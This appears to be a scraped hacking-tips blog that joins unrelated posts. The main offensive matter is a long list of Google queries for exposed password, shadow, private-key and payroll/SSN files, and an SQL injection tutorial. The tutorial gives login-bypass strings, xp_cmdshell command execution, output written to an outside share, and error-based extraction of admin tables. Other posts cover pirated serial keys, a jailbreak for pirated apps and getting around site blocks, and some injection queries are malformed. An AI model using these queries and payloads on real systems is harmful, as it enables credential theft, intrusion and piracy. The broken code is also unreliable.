How to Break into Web Sites Using Telnet


 
 You don't have to use a web browser to access files on a web site. All you need to do is:

    telnet 80

Or specify port 80 in a Windows telnet. If you are using Windows 95/98/NT, whenever you are NOT logging into a telnet account, you should enable local echo. Otherwise whatever you type in (unless you are in a telnet account) will not show on the screen. To enable local echo, click Terminal --> Preferences --> Local Echo.

So how do you send stuff back to the webserver? Try this:

    GET / HTTP/1.0

What kinds of commands can you send? The book Hackproofing Your Network (by Ryan Russell of Securityfocus.com and Stace Cunningham) suggests a fun and harmless hack. Create and store a bogus cookie in the location on your web browser that stores cookies. (Find it by searching for the file "cookies.txt".) Name your bogus cookie something like "MyBogusCookie." Then telnet to the victim webserver and give something like this command:

    GET / HTTP/1.0
    User-Agent: HaveABogusCookieThisIsAJoke 123.4
    Cookie: /; MyBogusCookie

The Überhacker! -- How to Break into Computers book details a number of serious attacks you can perform through sending funny input to a webserver. Basically, you need to learn how to write shell programs, and then find ways to get them to be run by the webserver. I'm not going to explain them here, however. These attacks, when carried out against a vulnerable webserver, are so easy that little kids could do them, and I don't want to be responsible for their behavior. It's much harder for little kids to get a hold of Russell's and my books than it is for them to read this GTMHH on the Happy Hacker website.

So are you dying to know what to send a webserver in order to break into it, without having to buy a book? Here are some hints. How to do this will depend on what webserver it is, what operating system it runs on, whether its security weaknesses have been fixed, and whether the web designer has used things such as Common Gateway Interface (CGI) or Server Side Includes (SSIs) that have weaknesses in them.

You will have to research these issues at Web sites that archive vulnerabilities and exploits such as and . You will need to study web site programming (HTML -- hypertext markup language, CGI and SSIs) and shell programming. You will need to learn webserver commands (documented at ). You will have to use your brain and be persistent. But at least if you come across a telnet exploit, now you know the answer to the question "where do I type that command?"

How to disable right click on the blog and protect your blog from content thieves


1. Sign in to your blog.
2. Open the Design tab --> Add widget --> HTML/JavaScript.
3. Copy this code and paste it there.


    <script language="JavaScript">
    <!--

    //Disable right mouse click Script
    //By Maximus (maximus@nsimail.com) w/ mods by DynamicDrive
    //For full source code, visit http://www.dynamicdrive.com

    var message="Function Disabled!";

    ///////////////////////////////////
    function clickIE4(){
    if (event.button==2){
    alert(message);
    return false;
    }
    }

    function clickNS4(e){
    if (document.layers||document.getElementById&&!document.all){
    if (e.which==2||e.which==3){
    alert(message);
    return false;
    }
    }
    }

    if (document.layers){
    document.captureEvents(Event.MOUSEDOWN);
    document.onmousedown=clickNS4;
    }
    else if (document.all&&!document.getElementById){
    document.onmousedown=clickIE4;
    }

    document.oncontextmenu=new Function("alert(message);return false")

    // -->
    </script>

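4. Click the Save button.

Note that this only suppresses the browser's context menu while JavaScript is enabled; the page source and its content remain retrievable by other means.

If you found this useful, please comment here.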

List of Password Search Queries on Google


 


"admin account info" filetype:log
! Host=*.* intext :enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl: (service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd "AutoCreate=TRUE password =*" "http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory" "liveice configuration file" ext:cfg -site: sourceforge.net
"parent directory" +proftpdpasswd
"powered by ducalendar" -site:duware.com "Powered by Duclassified" -site: duware.com
"Powered by Duclassified" -site:duware.com "DUware All Rights reserved"
"powered by duclassmate" - site:duware.com
"Powered by Dudirectory" -site:duware.com "powered by dudownload" -site: duware.com
"Powered By Elite Forum Version *.*"
"Powered by Link Department"
"sets mode: +k"
"your password is" filetype:log
" Powered by DUpaypal" -site: duware.com
allinurl: admin mdb auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret "current configuration" -intext : the
etc (index.of)
ext:asa | ext:bak intext :uid intext :pwd -"uid..pwd" database | server | dsn
ext:inc "pwd=" "UID=" ext:ini eudora.ini
ext:ini Version=4.0.0.4 password ext:passwd -intext :the - sample -example
ext:txt inurl:unattend. txt
ext:yml database inurl:config filetype:bak createobject sa
filetype: bak inurl:"htaccess|passwd|shadow| htusers"
filetype:cfg mrtg "target[*]" - sample -cvs -example
filetype:cfm "cfapplication name" password filetype: conf oekakibbs
filetype:conf slapd.conf filetype:config config intext : appSettings "User ID"
filetype:dat "password .dat"
filetype:dat inurl:Sites. dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext : mysql_connect
filetype:inc mysql_connect OR mysql_pconnect filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl: flashFXP.ini
filetype:ini ServUDaemon filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log inurl:"password .log"
filetype:mdb inurl: users.mdb
filetype:mdb wwforum filetype:netrc password filetype:pass pass intext :userid
filetype:pem intext : private
filetype:properties inurl:db intext :password filetype:pwd service filetype:pwl pwl
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg +intext :”WINVNC3”
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password )
filetype:sql ("values * MD5" | "values * password " | "values * encrypt";)
filetype:sql ("passwd values" | " password values" | "pass values" )
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password filetype:url +inurl:"ftp://" +inurl:";@"
filetypels username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"powered by EZGuestbook"
:"powered by Web Wiz Journal" intitle:"index of" intext :connect.inc intitle:"index of" intext :globals.inc intitle:"Index of" passwords modified intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql. default_password" +"Zend Scripting Language Engine"
intitle:dupics inurl: (add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle: index.of administrators.pwd
intitle: Index.of etc shadow
intitle:index.of intext :"secring.skr"|"secring. pgp"|"secring.bak"
intitle:rapidshare intext :login
inurl:"calendarscript/users. txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC. DAT" intext :"password "
inurl:"Sites. dat"+"PASS="
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext :"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"wvdial. conf" intext :"password "
inurl:/db/main. mdb
inurl:/wwwboard
inurl:/yabb/ Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar. cfg
inurl:chap-secrets -cvs
inurl:config. php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd - man
inurl:nuke filetype:sql
inurl:ospfd. conf intext :password -sample -test - tutorial -download
inurl:pap-secrets - cvs
inurl:pass.dat
inurl:perform filetype: ini
inurl:perform.ini filetype:ini
inurl: secring ext:skr | ext:pgp | ext:bak
inurl: server.cfg rcon password inurl: ventrilo_srv.ini adminpassword
inurl: vtund.conf intext :pass -cvs
inurl:zebra. conf intext :password -sample -test - tutorial -download
LeapFTP intitle:"index.of./" sites.ini modified master.passwd
mysql history files NickServ registration passwords
passlist passlist.txt (a better way)
passwd passwd / etc (reliable)
people.lst psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password = filetype:ica

GOOGLE SEARCH TRICKS


Google Operators:

Operators are used to refine the results and to maximize the search value. They are your tools as well as ethical hackers’ weapons.
Basic Operators: +, -, ~, ., *, “”, |, OR
Advanced Operators: allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange:


Basic Operators !!
(+) force inclusion of something common. Google ignores common words (where, how, digit, single letters) by default. Example: Star Wars Episode +I
(-) exclude a search term. Example: apple -red
(“) use quotes around a search term to search exact phrases. Example: “Robert Masse”. Robert masse without “” has 309,000 results, but “robert masse” has only 927 results. This removes the 99% of results that are irrelevant.
(~) search synonym. Example: ~food returns results about food as well as recipe, nutrition and cooking information.
( . ) a single-character wildcard. Example: m.trix returns results for M@trix, matrix, metrix...
( * ) any word wildcard

Advanced Operators: “Site:”
Site: Domain_name. Find Web pages only on the specified domain. If we search a specific site, usually we get the Web structure of the domain. Example: site:http://coolhackingtricks.blogspot.com

Advanced Operators: “Filetype:”
Filetype: extension_type. Find documents with specified extensions. The supported extensions are:
- HyperText Markup Language (html)
- Microsoft PowerPoint (ppt)
- Adobe Portable Document Format (pdf)
- Microsoft Word (doc)
- Adobe PostScript (ps)
- Microsoft Works (wks, wps, wdb)
- Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
- Microsoft Excel (xls)
- Microsoft Write (wri)
- Lotus WordPro (lwp)
- Rich Text Format (rtf)
- MacWrite (mw)
- Shockwave Flash (swf)
- Text (ans, txt)
Note: We can actually search asp, php, cgi and pl files as long as they are text-compatible. Example: Budget filetype: xls

Advanced Operators “Intitle:”
Intitle: search_term. Find search term within the title of a Webpage.
Allintitle: search_term1 search_term2 search_term3. Find multiple search terms in the Web pages with the title that includes all these words.
These operators are specifically useful to find directory lists. Example: find a directory list: Intitle: Index.of “parent directory”

Advanced Operators “Inurl:”
Inurl: search_term. Find search term in a Web address.
Allinurl: search_term1 search_term2 search_term3. Find multiple search terms in a Web address.
Examples: Inurl: cgi-bin; Allinurl: cgi-bin password

Advanced Operators “Intext:”
Intext: search_term. Find search term in the text body of a document.
Allintext: search_term1 search_term2 search_term3. Find multiple search terms in the text body of a document.
Examples: Intext: Administrator login; Allintext: Administrator login

Advanced Operators: “Cache:”
Cache: URL. Find the old version of a Website in the Google cache. Sometimes, even if the site has already been updated, the old information might be found in cache. Example: Cache: http://coolhackingtricks.blogspot.com

Advanced Operators: “..”
Conduct a number range search by specifying two numbers, separated by two periods, with no spaces. Be sure to specify a unit of measure or some other indicator of what the number range represents. Examples: Computer $500..1000; DVD player $250..350

Advanced Operators: “Daterange:”
Daterange: start_date-end_date. Find the Web pages between start date and end date.
Note: start_date and end_date use the Julian date. The Julian date is calculated by the number of days since January 1, 4713 BC. For example, the Julian date for August 1, 2001 is 2452122.
Examples: 2004.07.10=2453196, 2004.08.10=2453258. Vulnerabilities date range: 2453196-2453258

Advanced Operators “Link:”
Link: URL. Find the Web pages having a link to the specified URL.
Related: URL. Find the Web pages that are “similar” to the specified Web page.
Info: URL. Present some information that Google has about that Web page.
Define: search_term. Provide a definition of the words gathered from various online sources.
Examples: Link: coolhackingtricks.blogspot.com; Related:coolhackingtricks.blogspot.com; Info:coolhackingtricks.blogspot.com; Define: Network security

Advanced Operators “phonebook:”
Phonebook: search the entire Google phonebook.
rphonebook: search residential listings only.
bphonebook: search business listings only.
Examples: Phonebook: robert las vegas (robert in Las Vegas); Phonebook: (702) 944-2001 (reverse search, does not always work). The phonebook is quite limited to the U.S.A.


But the question arises: what can Google do for an ethical hacker?
- Search sensitive information like payroll, SIN, even the personal email box
- Vulnerabilities scanner
- Transparent proxy

So how about if I tell you a different way to search? OK, let's do this: type in the following statements and see the results. We can only provide you the guidelines; now you need to apply your creativity to keep it rolling.
http://coolhackingtricks.blogspot.com
Salary

Salary filetype: xls site: edu
Security social insurance number

Intitle: Payroll intext: ssn filetype: xls site: edu
Security Social Insurance Number

Payroll intext: Employee intext: ssn Filetype: xls Filetype: xls “checking account” “credit card” - intext: Application -intext: Form (only 39 results)
Financial Information

Intitle: “Index of” finances.xls (9)
Personal Mailbox

Intitle: Index.of inurl: Inbox (inurl: User OR inurl: Mail) (220)
Confidential Files

“not for distribution” confidential (1,760) Confidential Files “not for distribution” confidential filetype: pdf (marketing info) (456)
OS Detection
- Use the keywords of the default installation page of a Web server to search.
- Use the title to search
- Use the footer in a directory index page

OS Detection - Windows: “Microsoft-IIS/5.0 server at”
OS Detection - Windows default web page (IIS 5.0): Intitle: “Welcome to Windows 2000 Internet Services”
OS Detection - Apache 1.3.11-1.3.26: Intitle: Test.Page.for.Apache seeing.this.instead
OS Detection - Apache SSL enabled: Intitle: Test.page “SSL/TLS-aware” (127)

Search Passwords
- Search the well known password filenames in URL
- Search the database connection files or configuration files to find a password and username
- Search specific username file for a specific product

Inurl: etc inurl: passwd
Intitle: “Index of..etc” passwd
Inurl: admin.pwd filetype: pwd
Filetype: inc dbconn
Filetype: inc intext: mysql_connect
Filetype: ini +ws_ftp +pwd (get the encrypted passwords)
Filetype: log inurl: “password.log”

Search Username
+intext: "webalizer" +intext: “Total Usernames” +intext: “Usage Statistics for”

License Key
Filetype: lic lic intext: key (33) (license key)

Sensitive Directories Listing
Powerful buzz word: Index of
Search the well known vulnerable directories names
“index of cgi-bin” (3590)
Intitle: “Index of” cfide (coldfusion directory)
Intitle: index.of.winnt
Get the serial number you need ! (For Certain Things)

1) Go to Google. 2) Use Keyword as "Product name" 94FBR 3) Where, "Product Name" is the name of the item you want to find the serial number for. 4) And voila - there you go - the serial number you needed.
HOW DOES THIS WORK? Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things. 1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for. 2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page. See these example searches:

Code:

"Photoshop 7"+94FBR "Age of Mythology"+94FBR "Nero Burning Rom 5.5"+94FBR

Top20 Scan Method : Hacking Web Servers


 This method will scan the web server for the top 20 vulnerabilities list published by SANS/FBI (www.sans.org)

Hacking Tool: WebInspect


  • WebInspect is an impressive Web server and application-level vulnerability scanner which scans over 1500 known attacks.

  • It checks site contents and analyzes for rudimentary application-issues like smart guesswork checks, password guessing, parameter passing, and hidden parameter checks.

  • It can analyze a basic Webserver in 4 minutes cataloging over 1500 HTML pages
WebInspect enables application and web services developers to automate the discovery of security vulnerabilities as they build applications, access detailed steps for remediation of those vulnerabilities and deliver secure code for final quality assurance testing.
With WebInspect, the developer can find and correct vulnerabilities at their source, before attackers can exploit them. WebInspect provides the technology necessary to identify vulnerabilities at the next level, the Web application.
Network Tool: Shadow Security Scanner


  • Security scanner is designed to identify known and unknown vulnerabilities, suggest fixes to identified vulnerabilities, and report possible security holes within a network's internet, intranet and extranet environments.

  • Shadow Security Scanner includes vulnerability auditing modules for many systems and services.
These include NetBIOS, HTTP, CGI and WinCGI, FTP, DNS, DoS vulnerabilities, POP3, SMTP, LDAP, TCP/IP, UDP, Registry, Services, Users and accounts, Password vulnerabilities, publishing extensions, MSSQL, IBM DB2, Oracle, MySQL, PostgreSQL, Interbase, MiniSQL and more.
Running on its native Windows platform, SSS also scans servers built on practically any platform, successfully revealing vulnerabilities in Unix, Linux, FreeBSD, OpenBSD, NetBSD, Solaris and, of course, Windows 95/98/ME/NT/2000/XP/.NET. Because of its unique architecture, SSS is able to detect faults with CISCO, HP, and other network equipment. It is also capable of tracking more than 2,000 audits per system.
The Rules and Settings Editor will be essential for users who want to scan only the desired ports and services without wasting time and resources on scanning other services. Flexible tuning lets system administrators manage scanning depth and other options to benefit from speed-optimized network scanning without any loss in scanning quality.
Countermeasures


  • IISLockdown:

    • IISLockdown restricts anonymous access to system utilities as well as the ability to write to Web content directories.

    • It disables Web Distributed Authoring and Versioning (WebDAV).

    • It installs the URLScan ISAPI filter.

  • URLScan:

    • URLScan is a security tool that screens all incoming requests to the server by filtering the requests based on rules that are set by the administrator.
Filtering requests helps secure the server by ensuring that only valid requests are processed. UrlScan helps protect Web servers because most malicious attacks share a common characteristic: they involve the use of a request that is unusual in some way. For instance, the request might be extremely long, request an unusual action, be encoded using an alternate character set, or include character sequences that are rarely seen in legitimate requests. By filtering unusual requests, UrlScan helps prevent such requests from reaching the server and potentially causing damage.
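The four kinds of "unusual" request named above (length, action, character set, rare sequences) can be expressed as a small screening function. This is an added sketch, not UrlScan's own code, rules or defaults; the verb list, length limit, denied sequences and reason labels are assumptions chosen for illustration, and the request lines are constructed.

```python
import re
from urllib.parse import unquote

# Hypothetical policy for this sketch (not UrlScan defaults).
ALLOWED_VERBS = {"GET", "HEAD", "POST"}   # "unusual action" = any other verb
MAX_URL_LENGTH = 260                      # "extremely long" threshold
DENIED_SEQUENCES = ("..", "\\")           # rarely seen in legitimate paths
STILL_ENCODED = re.compile(r"%[0-9A-Fa-f]{2}")


def screen_request(request_line):
    """Return the list of reasons to reject a request line; [] means pass."""
    parts = request_line.split(" ")
    if len(parts) != 3:
        return ["malformed"]
    verb, target, _version = parts

    reasons = []
    if verb not in ALLOWED_VERBS:
        reasons.append("verb")
    if len(target) > MAX_URL_LENGTH:
        reasons.append("length")

    # Decode percent-escapes byte-for-byte so every escaped byte is visible.
    decoded = unquote(target, encoding="latin-1")
    if any(ord(ch) < 0x20 or ord(ch) > 0x7E for ch in decoded):
        reasons.append("charset")  # control or high-bit bytes in the URL

    # Path checks run on the decoded path, the form the server would act on.
    decoded_path = unquote(target.split("?", 1)[0], encoding="latin-1")
    if STILL_ENCODED.search(decoded_path):
        reasons.append("double-encoding")  # would decode a second time
    if any(seq in decoded_path for seq in DENIED_SEQUENCES):
        reasons.append("sequence")
    return reasons


# Constructed request lines, one per check.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.0",
    "PROPFIND /docs/ HTTP/1.1",
    "GET /" + "A" * 400 + " HTTP/1.0",
    "GET /caf%E9/menu.html HTTP/1.0",
    "GET /docs%252Freadme.txt HTTP/1.0",
    "GET /docs/../private/notes.txt HTTP/1.0",
]


def screen_all(requests=SAMPLE_REQUESTS):
    """Screen every request line and return a list of (line, reasons)."""
    return [(line, screen_request(line)) for line in requests]


if __name__ == "__main__":
    for line, reasons in screen_all():
        shown = line if len(line) < 60 else line[:57] + "..."
        print("PASS  " if not reasons else "REJECT", shown, reasons)
```

A filter like this rejects on request shape alone, so it complements patching and input handling in the application rather than replacing them.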

Summary


  • Web servers assume critical importance in the realm of Internet security.

  • Vulnerabilities exist in different releases of popular web servers and respective vendors patch these often.

  • The inherent security risks owing to compromised web servers have an impact on the local area networks that host these web sites, and even on the normal users of web browsers.

  • Looking through the long list of vulnerabilities that have been discovered and patched over the past few years provides an attacker ample scope to plan attacks on unpatched servers.

  • Different tools and exploit code aid an attacker in perpetrating web server hacking.

  • Countermeasures include scanning for existing vulnerabilities and patching them immediately, anonymous access restriction, and incoming traffic request screening and filtering.

Download video from YouTube without any software



 Here is the easiest way to download any video from Youtube.

While playing the video on youtube.com, copy its location from the address bar, like www.youtube.com/watch?v=sasad7657dms2

Then add the word ‘save’ between www. and youtube.com/link…

EXAMPLE: www.saveyoutube.com/watch?v=sasad7657dms2

That’s it. Download without any other software or going to any other site; there are many methods, but this one is the best according to me.
Enjoy.

How To Jailbreak iPhone 4G


Step 1: Download the Greenpois0n from http://cache.greenpois0n.com/dl/gp_win32_rc4.zip (if you think this link is infected search google for greenpois0n and download it )

Step 2: Extract and run greenpois0n, then plug in your Apple item.

Step 3: Turn your Apple item off.

Step 4: Press the “Prepare to Jailbreak (DFU)” button in greenpois0n; you will be guided by Greenpois0n on how to perform the next steps.

Step 5: Follow the steps (try being exact). Once you’re in DFU mode, click the ‘Jailbreak!’ button to jailbreak your iPhone.

Step 6: Now, just wait until the status bar shows complete, and your device will reboot to the home screen.



Step 7: You should now have a new “Loader” icon on your springboard. Launch Loader. Select Cydia > Install Cydia.

Step 8: Once Cydia has successfully been installed, you will be asked if you want to remove Loader. Hit “Remove” and your iPhone will automatically reboot. You will obtain a "Cydia" icon.

It is jailbroken :) Now let's work on Cydia:

- Start “Cydia” on your iPhone.

- Touch the “Manage” tab at the bottom.

- Now touch “Sources”.

- Touch “Edit” and then “Add”. You will be prompted to enter a URL source as seen in the screenshot below. Type “http://cydia.hackulo.us/” and touch “Add Source”.

- Now go and search for "Appsync" and select your version; I used "Appsync for 4.1 os" for my iPhone.

- Now go to iTunes on your computer (you should have the Apple item, e.g. iPhone, plugged into the PC), download any application, then sync it to your iPhone.

- We are nearly done. Open Cydia and search for Installous 3 (Note: don't choose Install0us, the one with "0").

- Open Installous and start downloading apps.
iphoneblogr.com



NOW UNLOCK SITES WITH NEW PROXY SITE


Friends, in schools, offices and colleges many sites are banned and locked so that you cannot use them. Here are some proxy sites through which you can access any banned site: just type the site name into the website and press go.


I am not giving hyperlinks for all of them due to lack of time, but you can copy and paste the others into your address bar; they will all work.


nimbuzz servers and ports


1. openfire.nimbuzz.com
2. gateway.nimbuzz.com (default baby,was closed by nimbuzz)
3. snow.nimbuzz.com
4. nickel.nimbuzz.com
5. xmpp00.nimbuzz.com
6. xmpp01.nimbuzz.com
7. xmpp02.nimbuzz.com
8. xmpp03.nimbuzz.com
9. xmpp04.nimbuzz.com
10. xmpp05.nimbuzz.com
11. xmpp06.nimbuzz.com
12. xmpp07.nimbuzz.com

PORTS:

1. 5222 (for plain text/TLS/SASL)

2. 5223 (for SSL connection)

3. 443 (if I'm not mistaken, this is for database connection (MySQL))

Hack Websites (SQL Injection Information)


When a machine has only port 80 open, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patches his server, we have to turn to web hacking. SQL injection is one type of web hacking that requires nothing but port 80, and it might just work even if the admin is patch-happy. It attacks the web application (ASP, JSP, PHP, CGI, etc.) itself rather than the web server or services running in the OS.

This article does not introduce anything new; SQL injection has been widely written about and used in the wild. We wrote the article because we would like to document some of our pen-tests using SQL injection and hope that it may be of some use to others. You may find a trick or two, but please check out the "9.0 Where can I get more info?" for people who truly deserve credit for developing many techniques in SQL injection.

1.1 What is SQL Injection?
It is a trick to inject a SQL query/command as input, possibly via web pages. Many web pages take parameters from the web user and make a SQL query to the database. Take for instance a user login: the web page takes the user name and password and makes a SQL query to the database to check whether the user has a valid name and password. With SQL injection, it is possible for us to send a crafted user name and/or password field that will change the SQL query and thus grant us something else.

1.2 What do you need?
Any web browser.

2.0 What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:




Everything between the <FORM> and </FORM> tags has potential parameters that might be useful (exploit wise).

2.1 What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:

http://duck/index.asp?id=10

3.0 How do you test if it is vulnerable?
Start with a single quote trick. Input something like:

hi' or 1=1--

Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--

If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:




If luck is on your side, you will get login without any login name or password.

3.1 But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:

http://duck/index.asp?category=food

In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):

v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:

SELECT * FROM product WHERE PCategory='food'

The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.

Now, assume that we change the URL into something like this:

http://duck/index.asp?category=food' or 1=1--

Now, our variable v_cat equals "food' or 1=1-- ". If we substitute this in the SQL query, we will have:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query should now select everything from the product table regardless of whether PCategory is equal to 'food' or not. A double dash "--" tells MS SQL Server to ignore the rest of the query, which gets rid of the last hanging single quote ('). Sometimes, it may be possible to replace the double dash with a single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you may also try

' or 'a'='a

The SQL query will now become:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

It should return the same result.

Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
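The concatenated query from section 3.1 is shown here beside a parameterized form. This is an added example, not part of the original article; it uses Python's sqlite3 module in place of ASP and MS SQL Server, and the table rows and function names are constructed for illustration.

```python
import sqlite3

# Constructed sample rows standing in for the article's `product` table.
ROWS = [
    ("apple", "food"),
    ("bread", "food"),
    ("hammer", "tools"),
    ("unreleased-item", "internal"),
]


def make_db():
    """Create an in-memory database holding the sample product table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (PName TEXT, PCategory TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?)", ROWS)
    return conn


def lookup_concatenated(conn, v_cat):
    """Vulnerable: builds the statement the same way as the ASP snippet."""
    sqlstr = "SELECT * FROM product WHERE PCategory='" + v_cat + "'"
    return conn.execute(sqlstr).fetchall()


def lookup_parameterized(conn, v_cat):
    """Hardened: the value is bound as data and is never parsed as SQL."""
    return conn.execute(
        "SELECT * FROM product WHERE PCategory=?", (v_cat,)
    ).fetchall()


def compare(values):
    """Map each input to (rows from concatenated, rows from parameterized).

    The first element is the string 'error' when the concatenated statement
    fails to parse, which is what a stray quote in ordinary input causes.
    """
    conn = make_db()
    out = {}
    for value in values:
        try:
            unsafe = len(lookup_concatenated(conn, value))
        except sqlite3.Error:
            unsafe = "error"
        out[value] = (unsafe, len(lookup_parameterized(conn, value)))
    conn.close()
    return out


if __name__ == "__main__":
    # Inputs taken from the article, plus one ordinary value with a quote.
    inputs = ["food", "food' or 1=1--", "food' or 'a'='a", "O'Brien"]
    for value, counts in compare(inputs).items():
        print(repr(value), counts)
```

With the bound parameter, the two article inputs match no category and return no rows, and the value containing an apostrophe is handled as plain data instead of breaking the statement.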

4.0 How do I get remote execution with SQL injection?
Being able to inject SQL commands usually means we can execute any SQL query at will. A default installation of MS SQL Server runs as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try using a double quote (") if a single quote (') is not working.

The semicolon ends the current SQL query and thus allows you to start a new SQL command. To verify that the command executed successfully, you can listen for ICMP packets on 10.10.1.2 and check whether any packet arrives from the server:

#tcpdump icmp

If you do not get any ping request from the server, and instead get an error message indicating a permission error, it is possible that the administrator has limited the web user's access to these stored procedures.

5.0 How to get output of my SQL query?
It is possible to use sp_makewebtask to write the output of your query into an HTML file:

'; EXEC master..sp_makewebtask "file://10.10.1.3/share/output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

But the target IP must have the folder "share" shared for Everyone.

6.0 How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:

http://duck/index.asp?id=10

We will try to UNION the integer '10' with another string from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".

To get the next table name, we can use the following query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

We can also search for data using the LIKE keyword:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5

The matching pattern, '%25login%25', will be seen as %login% by SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".

6.1 How to mine all column names of a table?
We can use another useful table, INFORMATION_SCHEMA.COLUMNS, to map out all the column names of a table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

Now that we have the first column name, we can use NOT IN () to get the next column name:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5

When we continue further, we obtain the rest of the column names, i.e. "password" and "details". We know we have them all when we get the following error message:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5

6.2 How to retrieve any data we want?
Now that we have identified some important tables and their columns, we can use the same technique to gather any information we want from the database.

